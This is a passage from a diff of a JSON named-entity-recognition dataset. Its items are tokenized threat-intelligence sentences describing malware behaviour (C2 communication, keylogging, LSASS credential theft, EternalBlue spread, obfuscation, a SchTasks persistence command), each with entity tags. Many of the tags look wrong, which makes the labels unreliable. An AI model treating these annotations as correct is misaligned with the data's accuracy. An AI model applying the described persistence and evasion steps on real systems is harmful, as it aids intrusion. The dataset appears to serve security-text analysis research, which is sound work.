+ "O", + "O", + "O" + ] + }, + { + "tokens": [ + "xCaon", + "has", + "decoded", + "strings", + "from", + "the", + "C2", + "server", + "before", + "executing", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "xCaon", + "has", + "a", + "command", + "to", + "download", + "files", + "to", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "xCaon", + "has", + "leveraged", + "native", + "OS", + "function", + "calls", + "to", + "retrieve", + "victim's", + "network", + "adapter's", + "information", + "using", + "GetAdapterInfo()", + "API." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "xCaon", + "has", + "checked", + "for", + "the", + "existence", + "of", + "Kaspersky", + "antivirus", + "software", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "xCaon", + "has", + "used", + "Base64", + "to", + "encode", + "its", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "xCaon", + "has", + "encrypted", + "data", + "sent", + "to", + "the", + "C2", + "server", + "using", + "a", + "XOR", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "xCaon", + "has", + "used", + "the", + "GetAdaptersInfo()", + "API", + "call", + "to", + "get", + "the", + "victim's", + "MAC", + "address." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "xCaon", + "has", + "communicated", + "with", + "the", + "C2", + "server", + "by", + "sending", + "POST", + "requests", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "xCaon", + "has", + "a", + "command", + "to", + "start", + "an", + "interactive", + "shell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "xCmd", + "can", + "be", + "used", + "to", + "execute", + "binaries", + "on", + "remote", + "systems", + "by", + "creating", + "and", + "starting", + "a", + "service." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "yty", + "communicates", + "to", + "the", + "C2", + "server", + "by", + "retrieving", + "a", + "Google", + "Doc." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "yty", + "contains", + "junk", + "code", + "in", + "its", + "binary,", + "likely", + "to", + "confuse", + "malware", + "analysts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "yty", + "collects", + "files", + "with", + "the", + "following", + "extensions:", + ".ppt,", + ".pptx,", + ".pdf,", + ".doc,", + ".docx,", + ".xls,", + ".xlsx,", + ".docm,", + ".rtf,", + ".inp,", + ".xlsm,", + ".csv,", + ".odt,", + ".pps,", + ".vcf", + "and", + "sends", + "them", + "back", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "yty", + "gathers", + "information", + "on", + "victim’s", + "drives", + "and", + "has", + "a", + "plugin", + "for", + "document", + "listing." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "yty", + "uses", + "a", + "keylogger", + "plugin", + "to", + "gather", + "keystrokes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "yty", + "gets", + "an", + "output", + "of", + "running", + "processes", + "using", + "the", + "<code>tasklist</code>", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "yty", + "uses", + "the", + "<code>net", + "view</code>", + "command", + "for", + "discovery." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "yty", + "establishes", + "persistence", + "by", + "creating", + "a", + "scheduled", + "task", + "with", + "the", + "command", + "<code>SchTasks", + "/Create", + "/SC", + "DAILY", + "/TN", + "BigData", + "/TR", + "“", + "+", + "path_file", + "+", + "“/ST", + "09:30“</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "yty", + "collects", + "screenshots", + "of", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "yty", + "packs", + "a", + "plugin", + "with", + "UPX." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "yty", + "has", + "some", + "basic", + "anti-sandbox", + "detection", + "that", + "tries", + "to", + "detect", + "Virtual", + "PC,", + "Sandboxie,", + "and", + "VMware." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "yty", + "gathers", + "the", + "computer", + "name,", + "the", + "serial", + "number", + "of", + "the", + "main", + "disk", + "volume,", + "CPU", + "information,", + "Microsoft", + "Windows", + "version,", + "and", + "runs", + "the", + "command", + "<code>systeminfo</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "yty", + "runs", + "<code>ipconfig", + "/all</code>", + "and", + "collects", + "the", + "domain", + "name." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "yty", + "collects", + "the", + "victim’s", + "username." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "zwShell", + "has", + "deleted", + "itself", + "after", + "creating", + "a", + "service", + "as", + "well", + "as", + "deleted", + "a", + "temporary", + "file", + "when", + "the", + "system", + "reboots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "zwShell", + "can", + "browse", + "the", + "file", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "zwShell", + "can", + "modify", + "the", + "Registry." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "zwShell", + "has", + "used", + "RDP", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "zwShell", + "has", + "been", + "copied", + "over", + "network", + "shares", + "to", + "move", + "laterally." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "zwShell", + "has", + "used", + "SchTasks", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "zwShell", + "can", + "obtain", + "the", + "victim", + "PC", + "name", + "and", + "OS", + "version." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "zwShell", + "can", + "obtain", + "the", + "victim", + "IP", + "address." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "zwShell", + "can", + "obtain", + "the", + "name", + "of", + "the", + "logged-in", + "user", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "zwShell", + "can", + "launch", + "command-line", + "shells." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "zwShell", + "has", + "established", + "persistence", + "by", + "adding", + "itself", + "as", + "a", + "new", + "service." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "file", + "extracts", + "credentials", + "from", + "LSASS", + "similar", + "to", + "Mimikatz." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "It", + "calls", + "OpenProcess", + "on", + "lsass.exe", + "with", + "access", + "flag", + "set", + "to", + "VM_READ,", + "and", + "looks", + "for", + "the", + "modules", + "wdigest.dll", + "and", + "lsasrv.dll", + "loaded", + "in", + "the", + "lsass.exe", + "process." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "It", + "spreads", + "to", + "Microsoft", + "Windows", + "machines", + "using", + "several", + "propagation", + "methods,", + "including", + "the", + "EternalBlue", + "exploit", + "for", + "the", + "CVE-2017-0144", + "vulnerability", + "in", + "the", + "SMB", + "service." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Exp", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "SMB", + "exploitation", + "via", + "EternalBlue" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "SMBv1", + "Exploitation", + "via", + "EternalBlue" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "has", + "the", + "capability", + "to", + "exploit", + "SMBv1", + "via", + "the", + "well", + "known", + "EternalBlue", + "exploit." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Features", + "B-Exp" + ] + }, + { + "tokens": [ + "SMB", + "copy", + "and", + "remote", + "execution" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "thread", + "is", + "then", + "used", + "to", + "execute", + "the", + "SMB", + "copy", + "and", + "remote", + "execution" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMB", + "copy", + "and", + "remote", + "execution" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMB", + "Copy", + "and", + "Remote", + "Execution" + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "The", + "malware", + "decompresses", + "its", + "resource", + "named" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "decompresses", + "a", + "resource" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "is", + "used", + "as", + "an", + "integrity", + "check", + "for", + "the", + "decryption", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypt", + "the", + "MFT," + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "code", + "attempts", + "to", + "decrypt", + "the", + "contents" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "sector", + "is", + "decrypted," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "the", + "same", + "key", + "is", + "used", + "to", + "decrypt", + "the", + "MFT." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "also", + "decoded,", + "and", + "placed", + "back" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "its", + "resource", + "section", + "are", + "decompressed", + "and", + "written", + "to", + "disk" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "is", + "a", + "DLL", + "that", + "is", + "launched", + "using", + "rundll32.exe:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "being", + "invoked", + "by", + "rundll32.exe." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Command", + "Line", + "Execution" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "command", + "line", + "arguments", + "are", + "generated" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "also", + "spawns", + "cmd.exe", + "to", + "execute", + "the", + "following", + "command" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "that", + "hashes", + "each", + "running", + "process", + "on", + "the", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Process", + "Hashes", + "and", + "Process", + "Privilege", + "Checks" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "track", + "which", + "of", + "the", + "3", + "processes", + "are", + "running", + "on", + "the", + "system." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "compares", + "each", + "hash", + "with", + "3", + "hardcoded", + "hashes:", + "0x6403527E", + "→", + "avp.exe", + "associated", + "with", + "Kaspersky", + "AV", + "0x23214B44", + "→", + "ns.exe", + "associated", + "with", + "Norton", + "Security", + "0x651B3005", + "→", + "ccSvcHst.exe", + "associated", + "with", + "Symantec" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Time" + ] + }, + { + "tokens": [ + "using", + "the", + "API", + "NtRaiseHardError" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "invokes", + "the", + "following", + "API’s:" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "GetExtendedTcpTable", + "to", + "retrieve", + "a", + "list", + "of", + "TCP", + "endpoints", + "GetIpNetTable", + "to", + "retrieve" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NetServerEnum", + "to", + "get", + "a", + "list" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NetServerGetInfoto", + "retrieve", + "the", + "current", + "configuration" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CreateFile", + "and", + "WriteFile", + "are", + "used" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "CreateProcessAsUser", + "or", + "CreateProcess", + "is", + "executed," + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "created", + "using", + "the", + "same", + "API", + "call;" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calls", + "CryptEncrypt" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "also", + "invokes", + "the", + "API", + "NTRaiseHardError." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "undocumented", + "Windows", + "API", + "that", + "causes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "the", + "API", + "fails", + "to", + "execute,", + "the", + "malware", + "calls", + "InitiateSystemShutdownExW" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "NetServerGetInfoto", + "retrieve", + "the", + "current", + "configuration", + "for", + "the", + "local", + "server" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Obtains", + "the", + "IP", + "address", + "from", + "the", + "ClientIpAddress", + "field" + ], + "ner_tags": [ + "B-SamFile", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "There", + "are", + "two", + "approaches", + "to", + "using", + "valid", + "credentials", + "to", + "copy", + "and", + "execute", + "the", + "malware", + "to", + "a", + "remote", + "host:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "used", + "to", + "connect", + "to", + "a", + "server", + "using", + "the", + "default", + "credentials" + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WMIC" + ], + "ner_tags": [ + "B-Time" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\wbem\\wmic.exe", + "/node" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "encodes", + "it", + "using", + "XOR", + "encoding", + "with", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "contains", + "the", + "original", + "MBR", + "that", + "was", + "encoded", + "by", + "XORing" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "were", + "previously", + "encrypted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "original", + "encoded", + "MBR" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obtain", + "keystrokes,", + "and", + "status", + "of", + "keyboard", + "buffer" + ], + "ner_tags": [ + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "only", + "targets", + "fixed", + "drives", + "on", + "the", + "system." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "will", + "first", + "start", + "enumerating", + "files", + "in", + "the", + "directory", + "it", + "is", + "being", + "executed", + "from." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "scheduled", + "task", + "is", + "set", + "to", + "trigger", + "60", + "minutes", + "after", + "the", + "malware", + "execution", + "by", + "default." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "scheduled", + "task", + "will", + "trigger", + "30", + "minutes", + "after", + "the", + "malware", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Explanation", + "of", + "schtask", + "parameters" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "taskrun.", + "Path", + "and", + "filename", + "of", + "the", + "task", + "to", + "be", + "run" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "instance,", + "immediately", + "after", + "execution,", + "it", + "loads", + "itself", + "in", + "memory,", + "and", + "deletes", + "itself", + "from", + "the", + "disk." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "delete", + "important", + "files" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "configuration", + "file", + "will", + "be", + "deleted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actors", + "use", + "Themida", + "packer", + "to", + "obfuscate", + "the", + "signature", + "used", + "for", + "detection." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "packed", + "by", + "noted", + "tools" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Themida-packed" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "upload/download", + "file" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "remote", + "shell", + "functions." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "supports", + "proxy", + "(Socks5)," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "with", + "SOCKS", + "v5", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "to", + "dump", + "information", + "from", + "the", + "victim’s", + "Oracle", + "database." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "information", + "stealer", + "used", + "to", + "harvest", + "internal", + "information." + ], + "ner_tags": [ + "O", + "I-SamFile", + "B-SecTeam", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Obfuscated", + "PowerShell", + "script" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "multi-layer", + "obfuscation" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "obfuscate", + "their", + "tools" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "have", + "adopted", + "more", + "obfuscation", + "techniques" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Heavily", + "obfuscated", + "PowerShell", + "script" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "the", + "encrypted", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "encrypted", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "obfuscate", + "control", + "flow", + "of", + "program." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Heavy", + "obfuscation", + "in", + "a", + "simple", + "but", + "useful", + "anti-analysis", + "approach", + "makes", + "it", + "difficult", + "for", + "security", + "products", + "to", + "detect", + "their", + "scripts." + ], + "ner_tags": [ + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actors", + "use", + "multi-layered", + "AES", + "encryption", + "and", + "base64", + "encoding", + "to", + "obfuscate" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscate", + "the", + "execution", + "flow", + "of", + "the", + "program" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decryption", + "algorithm" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypted", + "with", + "RC4", + "algorithm" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "usage", + "of", + "a", + "highly", + "similar", + "decryption", + "algorithm" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "decrypt", + "the", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypt", + "it" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decryption", + "function", + "into", + "RC4" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "they", + "always", + "have", + "used", + "DLL", + "sideloading", + "as", + "their", + "major", + "technique", + "to", + "launch", + "their", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "adopted", + "DLL", + "sideloading", + "techniques", + "to", + "run", + "their", + "malware." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "DLL", + "sideloading", + "to", + "launch", + "their", + "malware" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malicious", + "DLL", + "“gtn.dll”,", + "which", + "we", + "named", + "as", + "“ShellFang”,", + "loads", + "when", + "a", + "legitimate", + "executable", + "is", + "launched." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "including", + "API", + "hashing", + "and", + "execution", + "flow", + "obfuscation", + "through", + "exception", + "mechanism" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "APIs", + "are", + "obfuscated", + "via", + "a", + "hashing", + "function", + "and", + "dynamically", + "resolved", + "in", + "the", + "run-time." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Necessary", + "APIs", + "will", + "be", + "dynamically", + "resolved", + "during", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "API", + "obfuscation,", + "and", + "execution", + "flow", + "obfuscation" + ], + "ner_tags": [ + "B-Exp", + "B-Exp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "abusing", + "exception", + "mechanisms", + "to", + "obfuscate", + "the", + "execution", + "flow", + "of", + "programs", + "and", + "Windows", + "API", + "hashing." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "final", + "payload", + "is", + "an", + "HTTPs", + "Cobalt", + "Strike", + "beacon." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + 